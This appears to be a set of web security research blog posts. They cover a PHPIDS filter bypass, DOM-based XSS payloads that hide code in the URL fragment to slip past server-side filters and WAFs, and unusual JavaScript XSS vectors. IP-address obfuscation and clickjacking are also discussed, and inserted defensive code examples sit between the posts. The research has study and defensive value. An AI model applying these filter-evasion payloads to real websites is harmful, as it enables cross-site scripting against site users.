PHPIDS bypass

I haven’t hacked the PHPIDS for a while but David Lindsay (AKA Thornmaker) inspired me. When I say hacked I mean in a good way because finding bypasses helps improve the filters :)

Here is my vector:-

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

Notice the English-like text, which is there to get past the centrifuge detection. I use backslashes to continue strings across lines so that the regular expressions don’t match. “this” refers to the current window, and looking up the string “alert” on the window object gives a reference to the alert function. It’s worth noting Mario fixed it very quickly, so it no longer works. If you want a go and want to come up with your own vector then check out the phpids demo page.

Hackvertor video demo

I’ve finally created a Hackvertor video demo. I’ve encoded it in swf and compressed it quite a lot; the quality is good and at a high resolution, but the colours are a bit out. Other than that it should be quite clear how it works. The demo is available here:-

Hackvertor video demo

Location based XSS attacks

The basic attack

Using the hash portion of the location is a good way to beat filters: anything sent via the hash is not sent to the server in question. We can hide a large amount of data from the server-side filters and combine it with data that is sent to the server. For example we can send:-

http://someserver.com/somepage.php?param=",eval(location.hash.slice(1))//#alert(1)

Data sent to the server :

",eval(location.hash.slice(1))//

Data only sent through the client :

#alert(1)

“slice(1)” simply takes location.hash from the second character onwards, because the leading # is included in the hash and would raise a syntax error when evaluated.

More advanced variation

There are times when server-side filters will remove all instances of “(” or “)”, or maybe a WAF will disallow such requests. That alone will not save you from this sort of attack, because there’s a trick you can use to defeat those filters.

Remember the server can only see the server-side portion of the attack; we can combine both strings to produce our attack without sending “(” or “)” to the server. For example:-

http://someserver.com/somepage.php?param=",location='javascript:/*'+location.hash//#*/alert(1)

Data sent to the server :

",location='javascript:/*'+location.hash//

Data sent to the client :

#*/alert(1)

We start the comment in the server-side request and complete it in the client-side location.hash. Location is assigned javascript:/*#*/alert(1), so the # is swallowed by the comment and the slice(1) shown previously is no longer needed.

The attacks mentioned are DOM-based XSS attacks and are actually more common than you think; they are just more difficult to find than regular XSS.
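As an added example (mine, not code from the original post), the following JavaScript models the split the two attacks above rely on: what a server-side filter or WAF can inspect versus what stays in the browser, and how a page should consume a fragment if it needs one. It uses the WHATWG URL API (Node.js or a browser); the allowlisted section names are constructed for the example.

```javascript
// Added example, not code from the original post. Models the server/client
// split behind location-based DOM XSS and shows a safe way to use a fragment.

// What a server-side filter or WAF can inspect: origin, path and query string.
function serverVisiblePart(url) {
  const u = new URL(url);
  return u.origin + u.pathname + u.search;
}

// What never leaves the browser: the fragment, leading '#' included.
function clientOnlyPart(url) {
  return new URL(url).hash;
}

// A naive server-side filter of the kind the post describes. It only ever
// sees serverVisiblePart(), so it cannot touch anything after the '#'.
function naiveParenFilter(serverPart) {
  return serverPart.replace(/[()]/g, '');
}

// What the vulnerable page ends up handling: the filtered server part glued
// back together with the untouched fragment.
function whatTheBrowserSees(url) {
  return naiveParenFilter(serverVisiblePart(url)) + clientOnlyPart(url);
}

// The fix is to never feed the fragment to eval, location or innerHTML.
// Treat it as data: decode it, then accept only a value from a fixed
// allowlist (the section names here are constructed for the example).
const ALLOWED_SECTIONS = new Set(['intro', 'usage', 'faq']);

function sectionFromHash(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  let value;
  try {
    value = decodeURIComponent(raw);
  } catch (e) {
    return null; // malformed percent-encoding: reject rather than guess
  }
  return ALLOWED_SECTIONS.has(value) ? value : null;
}
```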

IP conversion

I’ve been busy investigating URLs recently and I thought my Hackvertor tool had all ways of changing an IP covered. But after researching stuff over the weekend I found that it is lacking in certain areas. For example you can convert two octets to octal or hex, and there wasn’t really an easy way of doing this with the current tags.

Decoding this stuff can also be useful, especially if you are analysing malware and want a quick way to decode a few obscured IPs. The decoders detect whether you are trying to decode a full IP address or part of one.

The tags supported are ip2dword, which converts an IP to a decimal number; it includes the ability to encode it a few more times with the parameter. This is possible because the unused hex numbers are discarded by the application; examples of how to use this are available below. ip2hex and ip2oct allow you to encode a full IP address or part of one (the rightmost part) with hex or octal. Each tag has an alternative decode.

Examples

I’ll use Google’s IP as an example: 216.239.59.99

First we can use ip2dword to convert it to decimal:-
dword conversion

It also supports a parameter which allows you to encode it a few more times:-
dword multiple

You can also encode part of the IP and the tags are clever enough to detect this automatically:-
dword part encode

Finally I’ll show you how to use the octal and hex encoding on a full or part of an IP address; I’ve included a part decode example as well, which decodes the last two octets of the IP:-
hex, octal and decoding
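As an added example (mine, not Hackvertor’s own code), the following JavaScript implements the encodings the tags above perform and the decoder an analyst needs to turn any of those forms back into a normal dotted IP. It follows the inet_aton rules that libc and browsers use (one to four dot-separated parts, each decimal, 0x hex or leading-zero octal, the last part filling the remaining bytes); discarding the bits above 32 in a dword is my reading of the repeated-encoding trick the post describes.

```javascript
// Added example, not Hackvertor's code. Encodes a dotted IP into the obscured
// forms the post's tags produce and decodes any of them back for analysis.

// One dot-separated part, in the notation inet_aton-style parsers accept:
// 0x.. is hex, a leading 0 means octal, anything else is decimal.
function parsePart(s) {
  if (/^0x[0-9a-f]+$/i.test(s)) return parseInt(s.slice(2), 16);
  if (/^0[0-7]+$/.test(s)) return parseInt(s.slice(1), 8);
  if (/^[0-9]+$/.test(s)) return parseInt(s, 10);
  throw new Error('unrecognised IP part: ' + s);
}

// Decode 1..4 parts to a dotted quad. The last part supplies every remaining
// byte, so "216.239.15203" and "3639556963" are both 216.239.59.99. Bits
// above 32 are discarded, which models the "encode it a few times" trick.
function decodeIp(str) {
  const parts = str.split('.').map(parsePart);
  if (parts.length < 1 || parts.length > 4) throw new Error('bad IP: ' + str);
  const head = parts.slice(0, -1);
  if (head.some(p => p > 255)) throw new Error('octet out of range: ' + str);
  const tailBytes = 4 - head.length;
  const tail = parts[parts.length - 1] % 2 ** (8 * tailBytes);
  const octets = head.slice();
  for (let i = tailBytes - 1; i >= 0; i--) {
    octets.push(Math.floor(tail / 256 ** i) % 256);
  }
  return octets.join('.');
}

// ip2dword: the whole address as one decimal number. `times` adds 2^32 that
// many times; a parser that keeps only the low 32 bits still resolves it.
function ip2dword(ip, times = 0) {
  const o = decodeIp(ip).split('.').map(Number);
  const dword = ((o[0] * 256 + o[1]) * 256 + o[2]) * 256 + o[3];
  return String(dword + times * 2 ** 32);
}

// ip2hex / ip2oct on the rightmost n octets (n = 4 for the full address):
// those octets become one hex or octal number, the rest stay decimal.
function ipEncodeTail(ip, n, base) {
  const o = decodeIp(ip).split('.').map(Number);
  const head = o.slice(0, 4 - n);
  const tail = o.slice(4 - n).reduce((acc, b) => acc * 256 + b, 0);
  const enc = base === 16 ? '0x' + tail.toString(16) : '0' + tail.toString(8);
  return head.concat(enc).join('.');
}
```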

Javascript vbscript challenge

Whilst hacking away in javascript I was experimenting with various things and I thought of a problem which would make a good challenge.

The idea was to produce some vbscript which executed the msgbox function without using parenthesis, but the trick was not to raise a syntax error in javascript when parsing the code. I found a cool solution to this but let’s see what you can come up with. Here are the main rules:-

Rules

1. No parenthesis may be used.
2. The vbscript version must execute msgbox with an argument of 1.
3. No syntax errors in either vbscript or jscript.
4. Errors can’t be turned off, using window.onerror for example is not allowed.
5. Both code samples must work in IE7.
6. The javascript and vbscript code should be identical.

In order to win the challenge you must provide the correct code which executes within the following tags:-

<script type="text/vbscript">
Your vbscript code here
</script>
 
<script type="text/javascript">
Your javascript code here
</script>

Hackvertor and clickjacking

Update

I’ve updated Hackvertor for the final time until the brand new version is ready. I thought I’d blog about it because it includes some interesting features from a security point of view.

HTML escape

The DOM inspector didn’t escape HTML when inspecting the DOM. This didn’t cause XSS because user interaction was needed to actually execute the inspector, but I fixed it anyway because I need to check some values when performing some javascript research.

Clickjacking protection

I’ve also added some Clickjacking/CSS Overlay/UI redressing/Insert Lame name here protection. It works by destroying the Hackvertor UI if it has been framed. I can do this because the vulnerability is that Hackvertor executes javascript and isn’t vulnerable to CSRF because there’s no server side action to perform :)

The code I’ve used is:-

if(top != self) {
   window.onload=function() {
     document.open();
     document.write('UI Redressing/Clickjacking/CSS Overlay/Latest Buzzword protection');
     document.close();
   }
}
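A frame buster like the one above only runs once the page has already loaded inside the framing site, and browsers later added the server-side answer to this: the X-Frame-Options header and the CSP frame-ancestors directive, which are enforced before the page renders. The following JavaScript is an added example (mine, not Hackvertor’s code) that applies those headers to a response header map and reviews an existing map for them; the header values are real, the sample header maps in the checks are constructed.

```javascript
// Added example, not Hackvertor's code. Header-based anti-framing that the
// browser enforces before the page (and any frame buster in it) runs.
const ANTI_FRAMING_HEADERS = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "frame-ancestors 'none'",
};

// Add both headers to a response header map: frame-ancestors is what modern
// browsers honour, X-Frame-Options covers older ones.
function withAntiFraming(headers) {
  return { ...headers, ...ANTI_FRAMING_HEADERS };
}

// Review a response's headers and report how framing is controlled:
// { mechanism: 'csp', sources } when frame-ancestors is present,
// { mechanism: 'x-frame-options', sources } for DENY / SAMEORIGIN,
// or null when nothing stops another site from framing the page.
function framingControl(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(d => d.trim())
    .find(d => /^frame-ancestors\b/i.test(d));
  if (directive) {
    return { mechanism: 'csp', sources: directive.split(/\s+/).slice(1) };
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    // Express the legacy header in CSP source terms for a uniform report.
    return { mechanism: 'x-frame-options', sources: [xfo === 'DENY' ? "'none'" : "'self'"] };
  }
  return null; // unprotected, or an unsupported value such as ALLOW-FROM
}
```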

Inspect output improvements

Finally I’ve updated the inspect output button. This button is really handy when you need to traverse an object quickly and find “hidden” properties or relationships with other objects. It works by evaluating the output entered and running a brute-force check on the object for properties between -10000 and 10000 as well as single characters. Why do this? Because it exposes some interesting browser quirks in Firefox and maybe others; originally it was inspired by DoctorDan’s discovery on sla.ckers that the reg exp object in Firefox contains a hidden property.

The format now looks nice and I’ve added native js properties to help with js hacking and XSS research. A sample of how it works can be found here:-
http://tinyurl.com/5jodze

Wordpress plugin security

It’s really bad. The amount of code that gets released and is vulnerable is shocking. Wordpress, you need to do something. Anything. Disable all plugins now, run an audit on the code or use a user security review process; even as a last resort run some sort of automation on the code. Is it really that hard? Scan for common vulnerabilities like echo PHP_SELF, global injections and so on.

I’ve just reviewed yet another security report from Blogsec and some more vulnerable plugins. You boast about all those users. Do something to help secure their software.

Bluehat

It was awesome! My first conference and the first time I’ve ever spoken about security stuff. I was really nervous but after the first one I calmed down a bit. We presented a total of three times, two 30 minute slots and a final 50 minutes. It was a lot easier because there were three of us and we all shared the talk equally, and it was pretty amazing that it worked because we only met in person when we got there.

The best part of the conference was meeting people with similar interests and talking about security stuff, I really enjoyed talking to Eduardo (Sirdarckcat), David Lindsay (Thornmaker), David Ross, Alex (Kuza55), Eric (Watch out for those banana men dude) and many more people.

Personally I think the best talk of the conference was about buffer overflow defenses in Windows (Mitigations Unplugged), I’m currently learning about these techniques and Matt did a great job of explaining every mitigation that Windows has. I can’t wait until I’m good enough to exploit these techniques :D

My part of the talk went well but I’ve just got to learn to slow down a bit and provide more explanation. Also turning the mic off when leaving the room would be a good idea :)

I went through my XSS vectors and I wanted to demo the creation of the final complex CSS expression vector but my Hackvertor tool wouldn’t fit on the damn screen :( I didn’t want to change the resolution in mid presentation. I might release a new video to the Bluehat site if I can get permission and if I actually record it. I then demoed my UTF-7 style sheet which is interesting, @charset at rule is not used much and I’m not sure if everyone knew it could be used to encode expressions :)

Finally I went through some CSS overlay (Click jacking) attacks and mitigation techniques. A browser level solution is needed here as all we’ve got currently is frame busters/breakers. If it was up to me I’d lock iframe/frame/object/applet styles and make them always visible but I can hear you designers shouting in the background.

Eduardo then described the best part of our talk IMO, the CSS attribute reader he came up with. It’s just plain awesome. When he described the technique to me via IM I thought it was cool but I couldn’t think of a viable attack situation; however, when meeting up he made it much clearer, and we came up with a few good ideas on how it can be used in an attack.

David Lindsay then went through some more CSS hacking techniques, LAN scanning and history crawling. We then went on to demo our games and POCs, which was fun.

The last day I was invited to be on the WAF panel debate because someone dropped out; it was a great opportunity to express the real problem behind the countless web sites with XSS and SQL injection holes. Nate and Mike really had some good views on the subject and I totally agreed with their opinion. We came to the conclusion that although a WAF can never be a perfect solution it does add some benefit; however, fix your code first and throw out the crappy books with examples like echo $_REQUEST['something'] in.

Before I forget my damn CSS paint application didn’t work :( Damn I should have simplified it for the presentation. Anyway here’s the fun demo:-
CSS paint

Other demos from our presentation are available here:-
Our demos

Last but not least the slides:-
the_sexy_assassin2ppt

To infinity and beyond!

I’m still heavily researching Javascript in search of XSS vectors and interesting syntax. I’ve found loads of cool stuff recently, and while looking through the ECMA spec I came across the Infinity object, which is a global and a number. Of course I was already aware of it, but I thought: what kind of interesting code can be constructed with it?

It turns out quite a lot. Here’s a window.name vector; I’ve added the variable name to simulate and execute the code.

name = 'alert(1)'
-Infinity++in eval(1&&name)

This doesn’t look like it could work, but it does:

+Infinity++in+alert(1)

And my final example combines a few different operators:-

1,0000instanceof delete~void--Infinity/~alert(1)

There are endless possibilities and I’ll leave you to play.

Javascript protocol fuzzer and Opera

I’ve updated my protocol fuzzer with charset support (Thanks Chris Weber for the suggestion). I tried the various browsers with the fuzzer so far nothing in IE8 yet :( but I downloaded the latest Opera and found these :D

Update…

Oops, I made a mistake: my fuzzer reported false positives because Opera reported the links correctly but when clicking them it doesn’t work. Previous versions did work using some of these entities, so I’m thinking it’s something they’ve fixed, but still a major doh moment from me. Next time I’ll manually test the links rather than listening to my code :)
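The lesson from those false positives is to let the browser’s own URL parser be the oracle rather than the fuzzer’s string handling. The following JavaScript is an added example (mine, not the fuzzer’s code) that rebuilds a link the way the fuzzer generated it (the Char code point inserted before the colon), asks the WHATWG URL parser what scheme it actually sees, and applies the scheme allowlist a defender wants on untrusted hrefs; the base URL and the allowlist are assumptions for the example.

```javascript
// Added example, not the fuzzer's code. Use the URL parser as the oracle for
// what scheme a link really has, and allowlist schemes on untrusted hrefs
// instead of blocklisting spellings of "javascript".

// Build a link the way the fuzzer did: "javascript", one code point, ":".
function fuzzedLink(codePoint, rest = 'x') {
  return 'javascript' + String.fromCodePoint(codePoint) + ':' + rest;
}

// The scheme the parser assigns after resolving against the page's base
// (an assumed base for the example), or null when parsing fails outright.
// A non-ASCII character inside the scheme is not a scheme at all, so such a
// link resolves as a relative path under the base, not as javascript:.
function parsedScheme(href, base = 'http://example.invalid/') {
  try {
    return new URL(href, base).protocol; // e.g. "javascript:" or "http:"
  } catch (e) {
    return null;
  }
}

// Defender-side check for hrefs taken from untrusted input: allowlist the
// schemes you expect and reject everything else, including parse failures.
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function isSafeHref(href) {
  const scheme = parsedScheme(href);
  return scheme !== null && SAFE_SCHEMES.has(scheme);
}

// Re-check one fuzzer report line ("Char:2048,Link:...") against the parser:
// true only when the parser really sees a javascript: scheme.
function confirmReportLine(line) {
  const m = /^Char:(\d+),/.exec(line);
  if (!m) throw new Error('unrecognised report line: ' + line);
  return parsedScheme(fuzzedLink(Number(m[1]))) === 'javascript:';
}
```

Note that the parser strips ASCII tab, LF and CR from its input before scheme parsing, so those three code points are the ones a report line like this genuinely confirms.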
